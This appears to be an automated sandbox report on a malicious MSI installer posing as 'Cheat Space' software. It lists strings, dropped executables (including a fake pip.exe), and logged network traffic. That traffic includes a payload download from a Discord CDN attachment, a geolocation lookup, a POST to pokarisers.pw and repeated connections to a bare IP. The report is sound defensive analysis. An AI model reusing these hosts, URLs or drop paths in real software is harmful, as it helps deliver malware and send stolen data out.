Source: LuaJIT.exe, 00000014.00000002.2336651652.00007FF677EA1000.00000002.00000001.01000000.00000006.sdmp	String found in binary or memory: https://luajit.org/
Source: powershell.exe, 00000004.00000002.1740005463.0000000005CED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1724939823.000000000602D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: BpOyVCAP8g.msi, MSI19CD.tmp.1.dr, MSI1A6A.tmp.1.dr, 5d1856.msi.1.dr	String found in binary or memory: https://www.advancedinstaller.com
Source: RegSvcs.exe, 00000018.00000002.2895356548.0000000000EE4000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000018.00000002.2895356548.0000000000E88000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.cloudflare.com/5xx-error-landing
Source: BpOyVCAP8g.msi, MSI19CD.tmp.1.dr, MSI1A6A.tmp.1.dr, 5d1856.msi.1.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: BpOyVCAP8g.msi, MSI19CD.tmp.1.dr, MSI1A6A.tmp.1.dr, 5d1856.msi.1.dr	String found in binary or memory: https://www.thawte.com/cps0/
Source: BpOyVCAP8g.msi, MSI19CD.tmp.1.dr, MSI1A6A.tmp.1.dr, 5d1856.msi.1.dr	String found in binary or memory: https://www.thawte.com/repository0W

Source: unknown

DNS traffic detected: queries for: ip-api.com

Source: global traffic	HTTP traffic detected: GET /attachments/1179749162376499230/1179749438646919228/9 HTTP/1.1User-Agent: TreeCache-Control: no-cacheHost: cdn.discordapp.comConnection: Keep-AliveCookie: __cf_bm=H5V4BmaROe3pfdYLY82TfiD1L50ETnjdEytCTXkusTM-1701620574-0-ASCSLniYwQKwFPBRNPu0k+YvtJNeRyC89AImgI45C/GaNLejxZ26LUu1GIyWcuKrb72UYAVWiHku5jBtFcdc0Bo=; _cfuvid=LsbyP5n461dKvXB8RQQKi94VdszAbPQe_KfYuUnazwk-1701620574736-0-604800000
Source: global traffic	HTTP traffic detected: GET /json/?fields=query,status,countryCode,city,timezone HTTP/1.1Content-Type: application/jsonUser-Agent: TreeHost: ip-api.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /attachments/1179749162376499230/1179749438646919228/9 HTTP/1.1Content-Type: application/jsonUser-Agent: TreeHost: cdn.discordapp.comCache-Control: no-cache

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443

Source: unknown	TCP traffic detected without corresponding DNS query: 213.248.43.99
Source: unknown	TCP traffic detected without corresponding DNS query: 213.248.43.99
Source: unknown	TCP traffic detected without corresponding DNS query: 213.248.43.99
Source: unknown	TCP traffic detected without corresponding DNS query: 213.248.43.99
Source: unknown	TCP traffic detected without corresponding DNS query: 213.248.43.99
Source: unknown	TCP traffic detected without corresponding DNS query: 213.248.43.99
Source: unknown	TCP traffic detected without corresponding DNS query: 213.248.43.99
Source: unknown	TCP traffic detected without corresponding DNS query: 213.248.43.99
Source: unknown	TCP traffic detected without corresponding DNS query: 213.248.43.99
Source: unknown	TCP traffic detected without corresponding DNS query: 213.248.43.99
Source: unknown	TCP traffic detected without corresponding DNS query: 213.248.43.99
Source: unknown	TCP traffic detected without corresponding DNS query: 213.248.43.99
Source: unknown	TCP traffic detected without corresponding DNS query: 213.248.43.99
Source: unknown	TCP traffic detected without corresponding DNS query: 213.248.43.99
Source: unknown	TCP traffic detected without corresponding DNS query: 213.248.43.99
Source: unknown	TCP traffic detected without corresponding DNS query: 213.248.43.99
Source: unknown	TCP traffic detected without corresponding DNS query: 213.248.43.99
Source: unknown	TCP traffic detected without corresponding DNS query: 213.248.43.99
Source: unknown	TCP traffic detected without corresponding DNS query: 213.248.43.99
Source: unknown	TCP traffic detected without corresponding DNS query: 213.248.43.99
Source: unknown	TCP traffic detected without corresponding DNS query: 213.248.43.99
Source: unknown	TCP traffic detected without corresponding DNS query: 213.248.43.99
Source: unknown	TCP traffic detected without corresponding DNS query: 213.248.43.99
Source: unknown	TCP traffic detected without corresponding DNS query: 213.248.43.99
Source: unknown	TCP traffic detected without corresponding DNS query: 213.248.43.99
Source: unknown	TCP traffic detected without corresponding DNS query: 213.248.43.99
Source: unknown	TCP traffic detected without corresponding DNS query: 213.248.43.99
Source: unknown	TCP traffic detected without corresponding DNS query: 213.248.43.99
Source: unknown	TCP traffic detected without corresponding DNS query: 213.248.43.99
Source: unknown	TCP traffic detected without corresponding DNS query: 213.248.43.99
Source: unknown	TCP traffic detected without corresponding DNS query: 213.248.43.99
Source: unknown	TCP traffic detected without corresponding DNS query: 213.248.43.99
Source: unknown	TCP traffic detected without corresponding DNS query: 213.248.43.99
Source: unknown	TCP traffic detected without corresponding DNS query: 213.248.43.99
Source: unknown	TCP traffic detected without corresponding DNS query: 213.248.43.99
Source: unknown	TCP traffic detected without corresponding DNS query: 213.248.43.99
Source: unknown	TCP traffic detected without corresponding DNS query: 213.248.43.99
Source: unknown	TCP traffic detected without corresponding DNS query: 213.248.43.99
Source: unknown	TCP traffic detected without corresponding DNS query: 213.248.43.99
Source: unknown	TCP traffic detected without corresponding DNS query: 213.248.43.99
Source: unknown	TCP traffic detected without corresponding DNS query: 213.248.43.99
Source: unknown	TCP traffic detected without corresponding DNS query: 213.248.43.99
Source: unknown	TCP traffic detected without corresponding DNS query: 213.248.43.99
Source: unknown	TCP traffic detected without corresponding DNS query: 213.248.43.99
Source: unknown	TCP traffic detected without corresponding DNS query: 213.248.43.99
Source: unknown	TCP traffic detected without corresponding DNS query: 213.248.43.99
Source: unknown	TCP traffic detected without corresponding DNS query: 213.248.43.99
Source: unknown	TCP traffic detected without corresponding DNS query: 213.248.43.99
Source: unknown	TCP traffic detected without corresponding DNS query: 213.248.43.99
Source: unknown	TCP traffic detected without corresponding DNS query: 213.248.43.99

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: pokarisers.pw

Source: unknown

HTTPS traffic detected: 162.159.130.233:443 -> 192.168.2.4:49739 version: TLS 1.2

System Summary

Drops large PE files

Source: C:\Program Files (x86)\Cheat Space Inc\Cheat Space\LuaJIT.exe

File dump: pip.exe.9.dr 1078604841

Jump to dropped file

Source: C:\Users\user\AppData\Roaming\Python\pip.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1136 -s 1348

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 6_2_04E0B738	6_2_04E0B738
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 6_2_04E0B728	6_2_04E0B728
Source: C:\Program Files (x86)\Cheat Space Inc\Cheat Space\LuaJIT.exe	Code function: 10_2_00007FF677E05530	10_2_00007FF677E05530
Source: C:\Program Files (x86)\Cheat Space Inc\Cheat Space\LuaJIT.exe	Code function: 10_2_00007FF677E858A4	10_2_00007FF677E858A4
Source: C:\Program Files (x86)\Cheat Space Inc\Cheat Space\LuaJIT.exe	Code function: 10_2_00007FF677E68854	10_2_00007FF677E68854
Source: C:\Program Files (x86)\Cheat Space Inc\Cheat Space\LuaJIT.exe	Code function: 10_2_00007FF677E2D820	10_2_00007FF677E2D820
Source: C:\Program Files (x86)\Cheat Space Inc\Cheat Space\LuaJIT.exe	Code function: 10_2_00007FF677E8C81C	10_2_00007FF677E8C81C
Source: C:\Program Files (x86)\Cheat Space Inc\Cheat Space\LuaJIT.exe	Code function: 10_2_00007FF677E807C8	10_2_00007FF677E807C8
Source: C:\Program Files (x86)\Cheat Space Inc\Cheat Space\LuaJIT.exe	Code function: 10_2_00007FF677E09760	10_2_00007FF677E09760
Source: C:\Program Files (x86)\Cheat Space Inc\Cheat Space\LuaJIT.exe	Code function: 10_2_00007FF677E1F6F0	10_2_00007FF677E1F6F0
Source: C:\Program Files (x86)\Cheat Space Inc\Cheat Space\LuaJIT.exe	Code function: 10_2_00007FF677E75664	10_2_00007FF677E75664
Source: C:\Program Files (x86)\Cheat Space Inc\Cheat Space\LuaJIT.exe	Code function: 10_2_00007FF677E93594	10_2_00007FF677E93594
Source: C:\Program Files (x86)\Cheat Space Inc\Cheat Space\LuaJIT.exe	Code function: 10_2_00007FF677E77560	10_2_00007FF677E77560
Source: C:\Program Files (x86)\Cheat Space Inc\Cheat Space\LuaJIT.exe	Code function: 10_2_00007FF677E8654C	10_2_00007FF677E8654C
Source: C:\Program Files (x86)\Cheat Space Inc\Cheat Space\LuaJIT.exe	Code function: 10_2_00007FF677E3E540	10_2_00007FF677E3E540
Source: C:\Program Files (x86)\Cheat Space Inc\Cheat Space\LuaJIT.exe	Code function: 10_2_00007FF677E4847C	10_2_00007FF677E4847C
Source: C:\Program Files (x86)\Cheat Space Inc\Cheat Space\LuaJIT.exe	Code function: 10_2_00007FF677E4A380	10_2_00007FF677E4A380
Source: C:\Program Files (x86)\Cheat Space Inc\Cheat Space\LuaJIT.exe	Code function: 10_2_00007FF677E68370	10_2_00007FF677E68370
Source: C:\Program Files (x86)\Cheat Space Inc\Cheat Space\LuaJIT.exe	Code function: 10_2_00007FF677E87360	10_2_00007FF677E87360
Source: C:\Program Files (x86)\Cheat Space Inc\Cheat Space\LuaJIT.exe	Code function: 10_2_00007FF677E90310	10_2_00007FF677E90310
Source: C:\Program Files (x86)\Cheat Space Inc\Cheat Space\LuaJIT.exe	Code function: 10_2_00007FF677E2FA70	10_2_00007FF677E2FA70
Source: C:\Program Files (x86)\Cheat Space Inc\Cheat Space\LuaJIT.exe	Code function: 10_2_00007FF677E392B0	10_2_00007FF677E392B0
Source: C:\Program Files (x86)\Cheat Space Inc\Cheat Space\LuaJIT.exe	Code function: 10_2_00007FF677E3C260	10_2_00007FF677E3C260
Source: C:\Program Files (x86)\Cheat Space Inc\Cheat Space\LuaJIT.exe	Code function: 10_2_00007FF677E43220	10_2_00007FF677E43220
Source: C:\Program Files (x86)\Cheat Space Inc\Cheat Space\LuaJIT.exe	Code function: 10_2_00007FF677E6D1FC	10_2_00007FF677E6D1FC
Source: C:\Program Files (x86)\Cheat Space Inc\Cheat Space\LuaJIT.exe	Code function: 10_2_00007FF677DF81A0	10_2_00007FF677DF81A0
Source: C:\Program Files (x86)\Cheat Space Inc\Cheat Space\LuaJIT.exe	Code function: 10_2_00007FF677E7815C	10_2_00007FF677E7815C
Source: C:\Program Files (x86)\Cheat Space Inc\Cheat Space\LuaJIT.exe	Code function: 10_2_00007FF677E75164	10_2_00007FF677E75164
Source: C:\Program Files (x86)\Cheat Space Inc\Cheat Space\LuaJIT.exe	Code function: 10_2_00007FF677E680D4	10_2_00007FF677E680D4
Source: C:\Program Files (x86)\Cheat Space Inc\Cheat Space\LuaJIT.exe	Code function: 10_2_00007FF677E360C0	10_2_00007FF677E360C0
Source: C:\Program Files (x86)\Cheat Space Inc\Cheat Space\LuaJIT.exe	Code function: 10_2_00007FF677E2A070	10_2_00007FF677E2A070
Source: C:\Program Files (x86)\Cheat Space Inc\Cheat Space\LuaJIT.exe	Code function: 10_2_00007FF677E8B04C	10_2_00007FF677E8B04C
Source: C:\Program Files (x86)\Cheat Space Inc\Cheat Space\LuaJIT.exe	Code function: 10_2_00007FF677E78040	10_2_00007FF677E78040
Source: C:\Program Files (x86)\Cheat Space Inc\Cheat Space\LuaJIT.exe	Code function: 10_2_00007FF677E93014	10_2_00007FF677E93014
Source: C:\Program Files (x86)\Cheat Space Inc\Cheat Space\LuaJIT.exe	Code function: 10_2_00007FF677E0BFC0	10_2_00007FF677E0BFC0
Source: C:\Program Files (x86)\Cheat Space Inc\Cheat Space\LuaJIT.exe	Code function: 10_2_00007FF677E11F90	10_2_00007FF677E11F90
Source: C:\Program Files (x86)\Cheat Space Inc\Cheat Space\LuaJIT.exe	Code function: 10_2_00007FF677E0AF80	10_2_00007FF677E0AF80
Source: C:\Program Files (x86)\Cheat Space Inc\Cheat Space\LuaJIT.exe	Code function: 10_2_00007FF677E9BF78	10_2_00007FF677E9BF78
Source: C:\Program Files (x86)\Cheat Space Inc\Cheat Space\LuaJIT.exe	Code function: 10_2_00007FF677E77F20	10_2_00007FF677E77F20
Source: C:\Program Files (x86)\Cheat Space Inc\Cheat Space\LuaJIT.exe	Code function: 10_2_00007FF677E0BEE0	10_2_00007FF677E0BEE0
Source: C:\Program Files (x86)\Cheat Space Inc\Cheat Space\LuaJIT.exe	Code function: 10_2_00007FF677E2EE80	10_2_00007FF677E2EE80
Source: C:\Program Files (x86)\Cheat Space Inc\Cheat Space\LuaJIT.exe	Code function: 10_2_00007FF677E67E50	10_2_00007FF677E67E50
Source: C:\Program Files (x86)\Cheat Space Inc\Cheat Space\LuaJIT.exe	Code function: 10_2_00007FF677E36E40	10_2_00007FF677E36E40
Source: C:\Program Files (x86)\Cheat Space Inc\Cheat Space\LuaJIT.exe	Code function: 10_2_00007FF677E68E28	10_2_00007FF677E68E28
Source: C:\Program Files (x86)\Cheat Space Inc\Cheat Space\LuaJIT.exe	Code function: 10_2_00007FF677E77E04	10_2_00007FF677E77E04
Source: C:\Program Files (x86)\Cheat Space Inc\Cheat Space\LuaJIT.exe	Code function: 10_2_00007FF677E92D80	10_2_00007FF677E92D80
Source: C:\Program Files (x86)\Cheat Space Inc\Cheat Space\LuaJIT.exe	Code function: 10_2_00007FF677E92C9C	10_2_00007FF677E92C9C
Source: C:\Program Files (x86)\Cheat Space Inc\Cheat Space\LuaJIT.exe	Code function: 10_2_00007FF677E68B34	10_2_00007FF677E68B34
Source: C:\Program Files (x86)\Cheat Space Inc\Cheat Space\LuaJIT.exe	Code function: 10_2_00007FF677E84B08	10_2_00007FF677E84B08
Source: C:\Program Files (x86)\Cheat Space Inc\Cheat Space\LuaJIT.exe	Code function: 10_2_00007FF677E57B10	10_2_00007FF677E57B10
Source: C:\Program Files (x86)\Cheat Space Inc\Cheat Space\LuaJIT.exe	Code function: 10_2_00007FF677E91AFC	10_2_00007FF677E91AFC
Source: C:\Program Files (x86)\Cheat Space Inc\Cheat Space\LuaJIT.exe	Code function: 10_2_00007FF677E4AB00	10_2_00007FF677E4AB00
Source: C:\Program Files (x86)\Cheat Space Inc\Cheat Space\LuaJIT.exe	Code function: 10_2_00007FF677E2FA70	10_2_00007FF677E2FA70
Source: C:\Program Files (x86)\Cheat Space Inc\Cheat Space\LuaJIT.exe	Code function: 10_2_00007FF677E06A70	10_2_00007FF677E06A70
Source: C:\Program Files (x86)\Cheat Space Inc\Cheat Space\LuaJIT.exe	Code function: 10_2_00007FF677E10A60	10_2_00007FF677E10A60
Source: C:\Program Files (x86)\Cheat Space Inc\Cheat Space\LuaJIT.exe	Code function: 10_2_00007FF677E8BA58	10_2_00007FF677E8BA58
Source: C:\Program Files (x86)\Cheat Space Inc\Cheat Space\LuaJIT.exe	Code function: 10_2_00007FF677E85A20	10_2_00007FF677E85A20
Source: C:\Program Files (x86)\Cheat Space Inc\Cheat Space\LuaJIT.exe	Code function: 10_2_00007FF677E28A00	10_2_00007FF677E28A00
Source: C:\Program Files (x86)\Cheat Space Inc\Cheat Space\LuaJIT.exe	Code function: 10_2_00007FF677E429C0	10_2_00007FF677E429C0
Source: C:\Program Files (x86)\Cheat Space Inc\Cheat Space\LuaJIT.exe	Code function: 10_2_00007FF677E399C0	10_2_00007FF677E399C0
Source: C:\Program Files (x86)\Cheat Space Inc\Cheat Space\LuaJIT.exe	Code function: 10_2_00007FF677E6C9AC	10_2_00007FF677E6C9AC
Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzI4.exe	Code function: 18_2_00007FF720B85530	18_2_00007FF720B85530
Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzI4.exe	Code function: 18_2_00007FF720C0654C	18_2_00007FF720C0654C
Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzI4.exe	Code function: 18_2_00007FF720BED1FC	18_2_00007FF720BED1FC
Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzI4.exe	Code function: 18_2_00007FF720B781A0	18_2_00007FF720B781A0
Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzI4.exe	Code function: 18_2_00007FF720BF5164	18_2_00007FF720BF5164
Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzI4.exe	Code function: 18_2_00007FF720BF815C	18_2_00007FF720BF815C
Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzI4.exe	Code function: 18_2_00007FF720BAFA70	18_2_00007FF720BAFA70
Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzI4.exe	Code function: 18_2_00007FF720C10310	18_2_00007FF720C10310
Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzI4.exe	Code function: 18_2_00007FF720BB92B0	18_2_00007FF720BB92B0
Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzI4.exe	Code function: 18_2_00007FF720BBC260	18_2_00007FF720BBC260
Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzI4.exe	Code function: 18_2_00007FF720BC3220	18_2_00007FF720BC3220
Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzI4.exe	Code function: 18_2_00007FF720C07360	18_2_00007FF720C07360
Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzI4.exe	Code function: 18_2_00007FF720BE8370	18_2_00007FF720BE8370
Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzI4.exe	Code function: 18_2_00007FF720BCA380	18_2_00007FF720BCA380
Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzI4.exe	Code function: 18_2_00007FF720BC847C	18_2_00007FF720BC847C
Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzI4.exe	Code function: 18_2_00007FF720BF7560	18_2_00007FF720BF7560
Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzI4.exe	Code function: 18_2_00007FF720C13594	18_2_00007FF720C13594
Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzI4.exe	Code function: 18_2_00007FF720BBE540	18_2_00007FF720BBE540
Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzI4.exe	Code function: 18_2_00007FF720B9F6F0	18_2_00007FF720B9F6F0
Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzI4.exe	Code function: 18_2_00007FF720BF5664	18_2_00007FF720BF5664
Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzI4.exe	Code function: 18_2_00007FF720C007C8	18_2_00007FF720C007C8
Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzI4.exe	Code function: 18_2_00007FF720B89760	18_2_00007FF720B89760
Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzI4.exe	Code function: 18_2_00007FF720C058A4	18_2_00007FF720C058A4
Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzI4.exe	Code function: 18_2_00007FF720BAD820	18_2_00007FF720BAD820
Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzI4.exe	Code function: 18_2_00007FF720C0C81C	18_2_00007FF720C0C81C
Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzI4.exe	Code function: 18_2_00007FF720BE8854	18_2_00007FF720BE8854
Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzI4.exe	Code function: 18_2_00007FF720BA8A00	18_2_00007FF720BA8A00
Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzI4.exe	Code function: 18_2_00007FF720BEC9AC	18_2_00007FF720BEC9AC
Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzI4.exe	Code function: 18_2_00007FF720BC29C0	18_2_00007FF720BC29C0
Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzI4.exe	Code function: 18_2_00007FF720BB99C0	18_2_00007FF720BB99C0
Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzI4.exe	Code function: 18_2_00007FF720BCAB00	18_2_00007FF720BCAB00
Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzI4.exe	Code function: 18_2_00007FF720C11AFC	18_2_00007FF720C11AFC
Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzI4.exe	Code function: 18_2_00007FF720BD7B10	18_2_00007FF720BD7B10
Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzI4.exe	Code function: 18_2_00007FF720C04B08	18_2_00007FF720C04B08
Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzI4.exe	Code function: 18_2_00007FF720B90A60	18_2_00007FF720B90A60
Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzI4.exe	Code function: 18_2_00007FF720C0BA58	18_2_00007FF720C0BA58
Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzI4.exe	Code function: 18_2_00007FF720BAFA70	18_2_00007FF720BAFA70
Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzI4.exe	Code function: 18_2_00007FF720B86A70	18_2_00007FF720B86A70
Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzI4.exe	Code function: 18_2_00007FF720C05A20	18_2_00007FF720C05A20
Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzI4.exe	Code function: 18_2_00007FF720BE8B34	18_2_00007FF720BE8B34
Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzI4.exe	Code function: 18_2_00007FF720C12C9C	18_2_00007FF720C12C9C
Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzI4.exe	Code function: 18_2_00007FF720BF7E04	18_2_00007FF720BF7E04
Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzI4.exe	Code function: 18_2_00007FF720C12D80	18_2_00007FF720C12D80
Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzI4.exe	Code function: 18_2_00007FF720B8BEE0	18_2_00007FF720B8BEE0
Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzI4.exe	Code function: 18_2_00007FF720BAEE80	18_2_00007FF720BAEE80
Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzI4.exe	Code function: 18_2_00007FF720BE8E28	18_2_00007FF720BE8E28
Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzI4.exe	Code function: 18_2_00007FF720BB6E40	18_2_00007FF720BB6E40
Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzI4.exe	Code function: 18_2_00007FF720BE7E50	18_2_00007FF720BE7E50
Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzI4.exe	Code function: 18_2_00007FF720C13014	18_2_00007FF720C13014
Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzI4.exe	Code function: 18_2_00007FF720B8BFC0	18_2_00007FF720B8BFC0
Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzI4.exe	Code function: 18_2_00007FF720B8AF80	18_2_00007FF720B8AF80
Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzI4.exe	Code function: 18_2_00007FF720C1BF78	18_2_00007FF720C1BF78
Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzI4.exe	Code function: 18_2_00007FF720B91F90	18_2_00007FF720B91F90
Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzI4.exe	Code function: 18_2_00007FF720BF7F20	18_2_00007FF720BF7F20
Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzI4.exe	Code function: 18_2_00007FF720BB60C0	18_2_00007FF720BB60C0
Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzI4.exe	Code function: 18_2_00007FF720BE80D4	18_2_00007FF720BE80D4
Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzI4.exe	Code function: 18_2_00007FF720BAA070	18_2_00007FF720BAA070
Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzI4.exe	Code function: 18_2_00007FF720C0B04C	18_2_00007FF720C0B04C
Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzI4.exe	Code function: 18_2_00007FF720BF8040	18_2_00007FF720BF8040
Source: C:\Users\user\AppData\Roaming\Python\pip.exe	Code function: 22_2_6CF0B6B0	22_2_6CF0B6B0
Source: C:\Users\user\AppData\Roaming\Python\pip.exe	Code function: 22_2_6CF5AC29	22_2_6CF5AC29
Source: C:\Users\user\AppData\Roaming\Python\pip.exe	Code function: 22_2_6CF02D70	22_2_6CF02D70
Source: C:\Users\user\AppData\Roaming\Python\pip.exe	Code function: 22_2_6CF34EE0	22_2_6CF34EE0
Source: C:\Users\user\AppData\Roaming\Python\pip.exe	Code function: 22_2_6CF24970	22_2_6CF24970
Source: C:\Users\user\AppData\Roaming\Python\pip.exe	Code function: 22_2_6CF24AC0	22_2_6CF24AC0
Source: C:\Users\user\AppData\Roaming\Python\pip.exe	Code function: 22_2_6CF50B89	22_2_6CF50B89
Source: C:\Users\user\AppData\Roaming\Python\pip.exe	Code function: 22_2_6CEE8B30	22_2_6CEE8B30
Source: C:\Users\user\AppData\Roaming\Python\pip.exe	Code function: 22_2_6CF24550	22_2_6CF24550
Source: C:\Users\user\AppData\Roaming\Python\pip.exe	Code function: 22_2_6CF5A54D	22_2_6CF5A54D
Source: C:\Users\user\AppData\Roaming\Python\pip.exe	Code function: 22_2_6CEE6650	22_2_6CEE6650
Source: C:\Users\user\AppData\Roaming\Python\pip.exe	Code function: 22_2_6CEEA7E0	22_2_6CEEA7E0
Source: C:\Users\user\AppData\Roaming\Python\pip.exe	Code function: 22_2_6CEEC7B0	22_2_6CEEC7B0
Source: C:\Users\user\AppData\Roaming\Python\pip.exe	Code function: 22_2_6CEFA0C0	22_2_6CEFA0C0
Source: C:\Users\user\AppData\Roaming\Python\pip.exe	Code function: 22_2_6CF363B0	22_2_6CF363B0
Source: C:\Users\user\AppData\Roaming\Python\pip.exe	Code function: 22_2_6CF42310	22_2_6CF42310
Source: C:\Users\user\AppData\Roaming\Python\pip.exe	Code function: 22_2_6CF41CA0	22_2_6CF41CA0
Source: C:\Users\user\AppData\Roaming\Python\pip.exe	Code function: 22_2_6CF23C90	22_2_6CF23C90
Source: C:\Users\user\AppData\Roaming\Python\pip.exe	Code function: 22_2_6CF35DD0	22_2_6CF35DD0
Source: C:\Users\user\AppData\Roaming\Python\pip.exe	Code function: 22_2_6CF55DD2	22_2_6CF55DD2
Source: C:\Users\user\AppData\Roaming\Python\pip.exe	Code function: 22_2_6CF35EB9	22_2_6CF35EB9
Source: C:\Users\user\AppData\Roaming\Python\pip.exe	Code function: 22_2_6CF23E50	22_2_6CF23E50
Source: C:\Users\user\AppData\Roaming\Python\pip.exe	Code function: 22_2_6CF5BFF1	22_2_6CF5BFF1
Source: C:\Users\user\AppData\Roaming\Python\pip.exe	Code function: 22_2_6CF59FFC	22_2_6CF59FFC
Source: C:\Users\user\AppData\Roaming\Python\pip.exe	Code function: 22_2_6CF358D7	22_2_6CF358D7
